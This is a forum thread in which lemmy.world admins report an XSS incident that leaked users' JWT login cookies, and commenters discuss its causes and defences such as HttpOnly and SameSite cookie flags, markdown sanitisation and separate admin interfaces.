While I was asleep, apparently the site was hacked. Luckily, (big) part of the lemmy.world team is in US, and some early birds in EU also helped mitigate this.

As I am told, this was the issue:

  • There is an vulnerability which was exploited
  • Several people had their JWT cookies leaked, including at least one admin
  • Attackers started changing site settings and posting fake announcements etc

Our mitigations:

  • We removed the vulnerability
  • Deleted all comments and private messages that contained the exploit
  • Rotated JWT secret which invalidated all existing cookies

The vulnerability will be fixed by the Lemmy devs.

Details of the vulnerability are here

Many thanks for all that helped, and sorry for any inconvenience caused!

Update While we believe the admins accounts were what they were after, it could be that other users accounts were compromised. Your cookie could have been ‘stolen’ and the hacker could have had access to your account, creating posts and comments under your name, and accessing/changing your settings (which shows your e-mail).

For this, you would have had to be using lemmy.world at that time, and load a page that had the vulnerability in it.

  • Marek Knápek@lemmy.world
    link
    fedilink
    arrow-up
    76
    arrow-down
    5
    ·
    1 year ago

    So what happened:

    • Someone posted a post.
    • The post contained some instruction to display custom emoji.
    • So far so good.
    • There is a bug in JavaScript (TypeScript) that runs on client’s machine (arbitrary code execution?).
    • The attacker leveraged the bug to grab victim’s JWT (cookie) when the victim visited the page with that post.
    • The attacker used the grabbed JWTs to log-in as victim (some of them were admins) and do bad stuff on the server.

    Am I right?

    I’m old-school developer/programmer and it seems that web is peace of sheet. Basic security stuff violated:

    • User provided content (post using custom emojis) caused havoc when processing (doesn’t matter if on server or on client). This is lack of sanitization of user-provided-data.
    • JavaScript (TypeScript) has access to cookies (and thus JWT). This should be handled by web browser, not JS. In case of log-in, in HTTPS POST request and in case of response of successful log-in, in HTTPS POST response. Then, in case of requesting web page, again, it should be handled in HTTPS GET request. This is lack of using least permissions as possible, JS should not have access to cookies.
    • How the attacker got those JWTs? JavaScript sent them to him? Web browser sent them to him when requesting resources form his server? This is lack of site isolation, one web page should not have access to other domains, requesting data form them or sending data to them.
    • The attacker logged-in as admin and caused havoc. Again, this should not be possible, admins should have normal level of access to the site, exactly the same as normal users do. Then, if they want to administer something, they should log-in using separate username + password into separate log-in form and display completely different web page, not allowing them to do the actions normal users can do. You know, separate UI/applications for users and for admins.

    Am I right? Correct me if I’m wrong.

    Again, web is peace of sheet. This would never happen in desktop/server application. Any of the bullet points above would prevent this from happening. Even if the previous bullet point failed to do its job. Am I too naïve? Maybe.

    Marek.

    • abhibeckert@lemmy.world
      link
      fedilink
      arrow-up
      24
      arrow-down
      1
      ·
      edit-2
      1 year ago

      I’m old-school developer/programmer and it seems that web is peace of sheet. Basic security stuff violated:

      I’m a modern web developer who used to be an old-school one.

      User provided content (post using custom emojis) caused havoc when processing (doesn’t matter if on server or on client). This is lack of sanitization of user-provided-data.

      Yeah - pretty much, though there are some mitigating factors.

      Strictly speaking, it was the alt text for the emoji. Alt text is HTML, and rather than allow arbitrary HTML they allowed another language called Markdown. Markdown is “a plain text” language with human readable syntax specifically designed to be converted into HTML.

      Markdown is the right format to use for emoji alt texts, but you do need to be careful of one thing - the original purpose of Markdown was to allow HTML content to be easier to write/read and it is a superset of the HTML language. So arbitrary HTML is valid markdown.

      Virtually all modern Markdown parsers disable arbitrary HTML by default, but it’s a behaviour which can be changed and that leaves potential for mistakes like this one here. Specifically the way Lemmy injected emojis with alt text into the Markdown content allowed arbitrary HTML.

      This wasn’t an obvious mistake - the issue over on Lemmy’s issue tracker is titled “Possible XSS Attack” because they knew there was an XSS Attack somewhere and they weren’t immediately sure if they had found it in the emoji system. Even now reading the diff to fix the vulnerability, it still isn’t obvious to me what they did wrong.

      It’s fairly complex code and complexity is the enemy of security… but sometimes you have to do complex things. Back in the “old-school” days, nobody would have even attempted to write something as complicated as a federated social network…

      JavaScript (TypeScript) has access to cookies (and thus JWT). This should be handled by web browser, not JS.

      Yeah - the Lemmy developers made a mistake there. There are a few things they aren’t doing right around cookies and JWT tokens.

      Hopefully they fix it. I expect they will… It was already actively being discussed before this incident, and those discussions have been seen by a lot more people now.

      How the attacker got those JWTs? JavaScript sent them to him? Web browser sent them to him when requesting resources form his server? This is lack of site isolation, one web page should not have access to other domains, requesting data form them or sending data to them.

      There are several levels of isolation that could have blocked this:

      1. Users should not be able to inject arbitrary HTML.
      2. A flag on the page should be set telling the browser to ignore JavaScript in the body of the page - this is a relatively new feature in the web and disabled by default for obvious backwards compatibility reasons, but it should be set especially on a high value target like Lemmy, and I expect once it’s been around a little longer browsers will enable it by default.
      3. A flag should have been set to block JavaScript from contacting an unknown third party domain. Again, this isolation is a relatively new web feature and currently disabled by default.
      4. As you say, JavaScript shouldn’t be able to access the JWT token or the cookie. That’s not a new feature in the web, it’s just one Lemmy developers didn’t take advantage of (I don’t know why)
      5. Even if all of those previous levels of isolation failed… there are things Lemmy should be doing to mitigate the attack. In particular instance admins have had to manually reset JWT tokens. Those tokens should have expired somehow on their own - possibly the moment the attacker tried to use them.

      The attacker logged-in as admin and caused havoc. Again, this should not be possible, admins should have normal level of access to the site, exactly the same as normal users do. Then, if they want to administer something, they should log-in using separate username + password into separate log-in form and display completely different web page, not allowing them to do the actions normal users can do. You know, separate UI/applications for users and for admins.

      Yep - the modern best practice is for admins to manage the site via a completely different system. That adds considerable complexity and cost though, so it’s rarely done unfortunately. But you know, Lemmy is open source… so if someone wants to take on that work they can do it.

      I’ll add one more - it should have taken less time to close the exploit… but given this is the first serious exploit I’ll forgive that.

      Ultimately several of failures contributed to this attack. I expect many of those failures will be corrected in the coming weeks, and that will make Lemmy far more secure than it is right now - so that next time there’s a bug like the one in the Markdown parser it isn’t able to cause so much disruption.

      The good news is no harm was done, and a lot of people are going to learn some valuable lessons as a result of this incident. Ultimately the outcome is a positive one in my opinion.

      • Roggie@lemmynsfw.com
        link
        fedilink
        arrow-up
        3
        ·
        1 year ago

        Awesome write up for someone who doesn’t have much experience at all in coding to understand. Thanks, it was a good read

    • Mountaineer@lemmy.world
      link
      fedilink
      English
      arrow-up
      9
      ·
      1 year ago

      JavaScript (TypeScript) has access to cookies (and thus JWT). This should be handled by web browser, not JS. In case of log-in, in HTTPS POST request and in case of response of successful log-in, in HTTPS POST response. Then, in case of requesting web page, again, it should be handled in HTTPS GET request. This is lack of using least permissions as possible, JS should not have access to cookies.

      JavaScript needs access to the cookies, they are the data storage for a given site.
      To protect them, the browser silos them to the individual site that created them, that’s why developers haven’t been able to easily load cross domain content for years, to mitigate XSS attacks.
      The security relies on the premise that the only valid source of script is the originating domain.
      The flaw here was allowing clients to add arbitrary script that was displayed to others.
      You’re dead right that only the way to fix this is to do away with JavaScript access to certain things, but it will require a complete refactor of how cookies work.
      I haven’t done any web dev in a few years, this might even be a solved problem by now and we are just seeing an old school implementation. 🤷

      • Marek Knápek@lemmy.world
        link
        fedilink
        English
        arrow-up
        9
        ·
        1 year ago

        this might even be a solved problem by now

        Yes, it is called HttpOnly and is decided by the server who is sending the cookie to you in HTTP response header. I believe there are also HTTPS-only cookies that when received via HTTPS, cannot be used from HTTP, but I cannot find it right now.

    • Marek Knápek@lemmy.world
      link
      fedilink
      arrow-up
      9
      ·
      1 year ago

      Oh I forgot another line of defense / basic security mitigation. If a server produces an access token (such as JWT or any other old school cookie / session ID), pair it with an IP address. So in case of cookie theft, the attacker cannot use this cookie from his computer (IP address). If the IP changes (mobile / WiFi / ADSL / whatever), the legitimate user should log-in again, now storing two auth cookies. In case of another IP change, no problemo, one of the stored cookies will work. Of course limit validity of the cookie in time (lets, say, keep it valid only for a day or for a week or so).

        • Marek Knápek@lemmy.world
          link
          fedilink
          arrow-up
          2
          arrow-down
          1
          ·
          1 year ago

          mobile devices change IP addresses all the time

          I never noticed this. Yes, switch between mobile and WiFi, but this is only two addresses. In case of IPv4 this seems not problem. In case of IPv6, use /64 or /48 (or whatever is now recommended for residential end users) prefix instead of the entire 128bits. I’m not proposing to log-out the suer after IP change, I’m proposing multiple sessions to be accessible at the same time.

          • linearchaos@lemmy.world
            link
            fedilink
            arrow-up
            1
            ·
            1 year ago

            Mobile will often switch ip’s on tower handoffs. If you’re driving down the road or on a train, it’s nothing to change mobile ip addresses every 2 minutes.

            • Marek Knápek@lemmy.world
              link
              fedilink
              arrow-up
              1
              ·
              1 year ago

              Not in my experience. But OK, if this is the case, don’t use exact IPv4 address, lookup the routing database and use the sub-net. Or whatever. This is belt & suspenders style of defense in depth, just another layer of security if all others fail. Not core functionality.

              • linearchaos@lemmy.world
                link
                fedilink
                English
                arrow-up
                2
                ·
                1 year ago

                I work for a mobile game company. Millions of clients. We deal with this a lot. You can’t even predict that they’ll stay in the same class A. I wouldn’t be surprised if they worked out a way to hand off ipv4 to 6 and vice-versa.

                Then you have ISP’s and large work networks who send everyone out under the same NAT/PAT, 10’s of thousands of users all coming from one address.

                IMO Providing a public service then trying to identify individuals by network without screwing someone over is a fools errand.

                If you’re dipping logs and see one jackass doing something on x IP, you always have to go back and see how many ip’s that jackass is coming from and also how much viable traffic is coming from that ip.

    • devnill@lemmy.world
      link
      fedilink
      arrow-up
      6
      ·
      1 year ago

      You’re totally right. I just looked at my old jwt cookie and was susceptible to CSRF (cross site request forgery) by virtue of not having the SameSite flag being set. This has since been fixed, but it looks like there might still be changes pending as Javascript is currently able to read the cookie value (the HttpOnly flag is currently set to false, meaning that it is able to be accessed by the browser). While this isn’t a major risk, it does increase the attack surface a bit.

    • VeganPizza69 Ⓥ@lemmy.world
      link
      fedilink
      arrow-up
      2
      ·
      1 year ago

      How the attacker got those JWTs? JavaScript sent them to him?

      If the “special emoji” code contained a script, it could simply read the cookie value and send it to a remote URL by using a XMLHttpRequest. I don’t think it has to be decoded to be used.

    • ComeHereOrIHookYou@lemmy.world
      link
      fedilink
      arrow-up
      1
      arrow-down
      1
      ·
      1 year ago

      The web being a PoS? Well, you’re certainly right on the money there. Not only that, but it has also become the norm for web technologies to be used in creating desktop applications too.

      So we’re bringing the security nightmare to desktop applications, and on top of that, it devours RAM like there’s no tomorrow, all for the sake of faster development.

    • dudebro@lemmy.world
      link
      fedilink
      arrow-up
      2
      arrow-down
      4
      ·
      1 year ago

      To be fair, it’s not an issue with “the web.” A bug in JavaScript is not a problem for the web. It’s a problem for people who use JavaScript.